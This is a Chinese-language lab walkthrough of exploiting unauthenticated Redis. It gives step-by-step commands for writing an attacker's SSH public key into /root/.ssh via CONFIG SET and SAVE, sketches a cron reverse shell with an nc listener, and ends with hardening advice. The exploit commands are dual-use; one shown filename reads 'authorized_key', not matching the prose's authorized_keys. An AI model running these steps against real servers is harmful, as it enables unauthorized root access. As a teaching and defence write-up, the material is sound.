1.应用介绍

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。

2. 漏洞介绍

Redis因配置不当可以导致未授权访问，被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式，在特定条件下，如果Redis以root身份运行，黑客可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器，可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生，严重危害业务正常服务。部分服务器上的Redis 绑定在 0.0.0.0:6379，并且没有开启认证（这是Redis 的默认配置），以及该端口可以通过公网直接访问，如果没有采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，将会导致 Redis 服务直接暴露在公网上，可能造成其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。

目前比较主流的案例：yam2 minerd 挖矿程序，还有在多次应急事件中发现大量的watch-smartd挖矿木马。

image

3.未授权访问检测

Nmap扫描后发现主机的6379端口对外开放，就可以用本地Redis远程连接服务器redis在开放往外网的情况下(默认配置是bind 127.0.0.1，只允许本地访问，如果配置了其他网卡地址那么就可以网络访问，默认配置下是空口令，端口为6379）连接后可以获取Redis敏感数据。

4.漏洞利用

1.登录不受保护的Redis

2.将其备份位置更改为.ssh目录 - 将SSH密钥写入新的备份位置

3.使用SSH密钥远程连接并登录目标服务器

5.漏洞复现

本次示例的环境配置：

目标机器：Centos6上的Redis-3.2.11

攻击机：kali

5.1配置目标机器

首先，在目标机器上安装Redis。通过下面这个命令来下载源码：

wget http://download.redis.io/releases/redis-3.2.11.tar.gz

解压和编译，命令如下：

tar xzf redis-3.2.11.tar.gz cd redis-3.2.11

make

make之后，我们打开redis-3.2.11目录下的redis.conf配置文件。为了能够进行远程访问，我们需要注释掉 bind 127.0.0.1这一行，并禁用protected-mode，如图所示：

image.png

现在使用我们刚才编辑的配置文件启动Redis服务。注意：redis-server在redis-3.2.11/src目录下，启动命令如下：

src/redis-server redis.conf

现在，我们已经完成了目标服务器的设置。此外，我们还应检查是否有 .ssh文件夹。如果没有，我们应该创建一个，一会儿攻击时会用到。

5.2攻击机配置

首先，确定我们可以ping通目标。然后，我们将生成一个私钥和公钥，以便稍后SSH到目标机器中。运行以下命令以生成SSH密钥并将密码保留为空：

ssh-keygen -t rsa

然后，进入.ssh目录，如果你是root用户，请输入/.ssh，不是root用户，输入~/.ssh，然后将公钥导入到temp.txt中（前后用\n换行，避免和Redis里其他缓存数据混合）：

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > temp.txt

image.png

很好，现在我们已经生成了一对密钥对，现在我们需要找到一个方法将公钥上传到Redis服务器中(目标机器)。

我们将使用redis-cli向Redis服务器发送命令，并且直接在终端中读取服务器的响应。

在.ssh目录下执行以下命令：

cat temp.txt | redis-cli -h 192.168.20.130 -x set s-key

这里，我们来看看命令。我们使用-h参数来指定远程Redis服务器IP，这样redis-cli就可以进行连接并发送命令。-x参数后的语句意思是，设置redis中s-key密钥的值为temp.txt。

image.png

这里，我们有了一个隐藏着ssh秘钥的密钥！现在我们再来连接到Redis并查看它的配置文件。使用redis-cli再次连接到Redis服务器，如图所示：

image.png

这里修改目录出现了错误，提示是无访问权限，是因为redis服务器那/root目录下的权限不够，修改下目录的权限，不知道为什么碰见这个问题

image.png

192.168.20.130:6379> config set dir /root/.ssh
OK
192.168.20.130:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.20.130:6379> config set dbfilename authorized_key
OK
192.168.20.130:6379> config get dbfilename
1) "dbfilename"
2) "authorized_key"
192.168.20.130:6379> save
OK

查看上面的截图，我们首先使用get s-key命令来验证s-key密钥的值，这个值正是我们想要的 - 前后有两个空行的公钥。我们这里真正要做的就是获取存储在.ssh文件夹中的“s-key”（SSH公钥）的值，也就是将temp.txt内容写入到服务器redis内为s-key，将内容保存成authorized_keys， 这样我们就可以不用输入密码而远程SSH登录到目标机器了。

在攻击机上，使用下列命令ssh连接到目标机器上：

# command: private key username@server IP

ssh -i id_rsa username@IP

image.png

image.png

法二，定时反弹shell

kali : 192.168.20.135
centos : 192.168.20.130
1.开启redis

src/redis-server redis.conf

2.与目标主机连接

root@kali:~# redis-cli -h 192.168.20.130

3. kali主机进行监听

nc -l -v -p 4444

4.写入shell并保存

image.png

5.连接

image.png

6.修复建议

修复建议/安全建议
1.禁止一些高危命令
修改 redis.conf 文件，添加

rename-command FLUSHALL ""
rename-command CONFIG   ""
rename-command EVAL     ""

来禁用远程修改 DB 文件地址

2.以低权限运行 Redis 服务
为 Redis 服务创建单独的用户和家目录，并且配置禁止登陆

$ groupadd -r redis && useradd -r -g redis redis

3.为 Redis 添加密码验证
修改 redis.conf 文件，添加

requirepass mypassword

4.禁止外网访问 Redis
修改 redis.conf 文件，添加或修改，使得 Redis 服务只在当前主机可用

bind 127.0.0.1

5.保证 authorized_keys 文件的安全
为了保证安全，您应该阻止其他用户添加新的公钥。

将 authorized_keys 的权限设置为对拥有者只读，其他用户没有任何权限：

$ chmod 400 ~/.ssh/authorized_keys

为保证 authorized_keys 的权限不会被改掉，您还需要设置该文件的 immutable 位权限：

 chattr +i ~/.ssh/authorized_keys

然而，用户还可以重命名 ~/.ssh，然后新建新的 ~/.ssh 目录和 authorized_keys 文件。要避免这种情况，需要设置 ~./ssh 的 immutable 位权限：

 chattr +i ~/.ssh